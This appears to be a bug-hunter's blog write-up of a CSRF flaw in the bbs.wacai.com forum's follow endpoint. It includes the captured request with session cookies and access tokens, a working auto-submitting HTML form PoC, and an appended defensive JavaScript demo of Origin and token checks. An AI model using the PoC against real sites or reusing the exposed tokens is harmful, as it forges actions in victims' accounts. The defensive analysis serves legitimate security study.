麦秋记

Category: Random notes

An overlooked CSRF vulnerability

While hunting for bugs in Wacai, I noticed the community has a "follow" feature and decided to test whether it was vulnerable to CSRF.

[screenshot: 1.png]

Looking at the captured request:

POST /web/api2/follow/add HTTP/1.1
Host: bbs.wacai.com
Connection: close
Content-Length: 11
Accept: application/json, text/plain, */*
Origin: https://bbs.wacai.com
x-requested-with: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: 
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: _jzqa=1.730756309610637800.1559026364.1559026364.1559026364.1; _jzqc=1; _jzqckmp=1; Hm_lvt_0311e2d8c20d5428ab91f7c14ba1be08=1559026364; JSESSIONID=F6C1E5169FB386C74E06CC8DF0209BCF; sajssdk_2015_cross_new_user=1; __lsd_did__=76e4956a50e74d6bfc598b33c65fd079; wctk=WCeO2k48oDZrB9BPYLKsjilV6feWBqobvSNwQ; wctk.sig=Fz7T2rfrGmqANvme8V_VKae06jQ; access_token=WCeO2k48oDZrB9BPYLKsjilV6feWBqobvSNwQ; access_token.sig=swxHsDm9M_QBVnZb6K5nmKEQdhQ; Hm_lvt_bc65f2f4ddfe3a1cda888f512e73f7f1=1559026827,1559026864; sensorsdata2015jssdkcross=%7B%22distinct_id%22%3A%2216afd3685a0458-0e50e32cb8d3c4-37657e04-1296000-16afd3685a1aa3%22%2C%22%24device_id%22%3A%2216afd3685a0458-0e50e32cb8d3c4-37657e04-1296000-16afd3685a1aa3%22%2C%22props%22%3A%7B%22%24latest_referrer%22%3A%22%22%2C%22%24latest_referrer_host%22%3A%22%22%2C%22%24latest_traffic_source_type%22%3A%22%E7%9B%B4%E6%8E%A5%E6%B5%81%E9%87%8F%22%2C%22%24latest_search_keyword%22%3A%22%E6%9C%AA%E5%8F%96%E5%88%B0%E5%80%BC_%E7%9B%B4%E6%8E%A5%E6%89%93%E5%BC%80%22%7D%7D; refresh_token=""; _jzqb=1.6.10.1559026364.1; Hm_lpvt_0311e2d8c20d5428ab91f7c14ba1be08=1559027090; Hm_lpvt_bc65f2f4ddfe3a1cda888f512e73f7f1=1559027120

uid=2517471

After clearing the Referer header I could still follow the user:

HTTP/1.1 200 OK
Server: Safe3waf/2.3.5
Date: Tue, 28 May 2019 07:07:10 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 45
Connection: close
X-XSS-Protection: 1; mode=block
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Expires: 0

{"code":4003,"error":"已经关注该用户"}

(The error string means "already following this user".)

The payload:

<html>
<body>
<!-- action must be the absolute target URL: a relative path only resolves to
     bbs.wacai.com when the page itself is served from that origin -->
<form id="csrf" name="csrf" action="https://bbs.wacai.com/web/api2/follow/add" method="POST">
<input type="text" name="uid" value="111111" />
<input type="submit" value="submit" />
</form>
<script>
	// auto-submit as soon as the victim loads the page; the browser attaches
	// the bbs.wacai.com session cookies to the cross-site POST
	document.csrf.submit();
</script>
</body>
</html>
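Blanking the Referer on a replayed request only shows that a Referer check is lenient; it does not reproduce what the PoC form above actually sends. A cross-site form POST arrives with the attacker's Origin, without the custom x-requested-with header (an HTML form cannot set it) and without any anti-CSRF token, so any one of those checks on the server would have rejected the form even with Referer empty. The following is an added example, not code from the original post or from Wacai: a server-side verdict function run over three constructed requests, the captured one with Referer blanked, the one the PoC form would produce from an attacker page, and a legitimate same-origin request carrying a token. The header names, the `_csrf` body field, the session token and the attacker hostname are assumptions.

```javascript
// Added example (not from the original post): server-side CSRF checks a
// state-changing endpoint such as /web/api2/follow/add could apply, and how
// each one fares against a replayed request versus a cross-site form POST.

const ALLOWED_ORIGIN = "https://bbs.wacai.com"; // assumed target origin

// req = { headers: {name: value}, body: {field: value}, sessionToken }
// Returns one boolean per defence plus the overall decision.
function csrfVerdict(req) {
  // header names are case-insensitive; normalise before lookup
  const h = Object.fromEntries(
    Object.entries(req.headers).map(([k, v]) => [k.toLowerCase(), v])
  );
  const referer = h["referer"] || "";
  const verdict = {};

  // Lenient Referer check (the behaviour the post observed): accepts when the
  // header is absent or empty, so simply blanking Referer gets through.
  verdict.refererLenient =
    referer === "" || referer.startsWith(ALLOWED_ORIGIN + "/");

  // Strict Referer check: fail closed when the header is missing.
  verdict.refererStrict = referer.startsWith(ALLOWED_ORIGIN + "/");

  // Origin check: browsers add Origin to cross-site POSTs, so a form hosted
  // on another site arrives with that site's origin, never bbs.wacai.com.
  verdict.origin = h["origin"] === ALLOWED_ORIGIN;

  // Custom-header check: a plain HTML form cannot set X-Requested-With; only
  // same-origin XHR/fetch can (cross-origin would need a CORS preflight).
  verdict.customHeader = h["x-requested-with"] === "XMLHttpRequest";

  // Synchronizer token: the body must carry the token bound to the session.
  // An attacker page cannot read the victim's token, so it cannot forge it.
  // (Production code should compare with a constant-time comparison.)
  const token = req.body && req.body._csrf;
  verdict.token =
    typeof token === "string" && token.length > 0 && token === req.sessionToken;

  // Accept only when both the origin and the token check pass.
  verdict.accepted = verdict.origin && verdict.token;
  return verdict;
}

// Constructed sample: the post's captured request with Referer blanked.
const capturedRequest = {
  headers: {
    Origin: "https://bbs.wacai.com",
    "x-requested-with": "XMLHttpRequest",
    Referer: "",
    "Content-Type": "application/x-www-form-urlencoded",
  },
  body: { uid: "2517471" },
  sessionToken: "s3ss10n-csrf-token", // assumed server-side token
};

// Constructed sample: what the PoC form sends from an attacker page.
const pocFormRequest = {
  headers: {
    Origin: "https://evil.example.org",           // assumed attacker host
    Referer: "https://evil.example.org/csrf.html",
    "Content-Type": "application/x-www-form-urlencoded",
  },
  body: { uid: "111111" },
  sessionToken: "s3ss10n-csrf-token",
};

// Constructed sample: a legitimate same-origin request carrying the token.
const legitimateRequest = {
  headers: {
    Origin: "https://bbs.wacai.com",
    "x-requested-with": "XMLHttpRequest",
    Referer: "https://bbs.wacai.com/user/2517471",
    "Content-Type": "application/x-www-form-urlencoded",
  },
  body: { uid: "2517471", _csrf: "s3ss10n-csrf-token" },
  sessionToken: "s3ss10n-csrf-token",
};

function demo() {
  return {
    captured: csrfVerdict(capturedRequest),
    poc: csrfVerdict(pocFormRequest),
    legitimate: csrfVerdict(legitimateRequest),
  };
}

console.log(demo());
```

The captured request passes the lenient Referer check, which is exactly the weakness the post found, but it would already fail an Origin-or-token policy because the replay carries no token. The PoC form request fails every check except none: wrong Origin, no custom header, no token. Only the legitimate request is accepted, so a fix on the server is to require a synchronizer token and to validate Origin with a fail-closed policy rather than tolerating an empty Referer.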

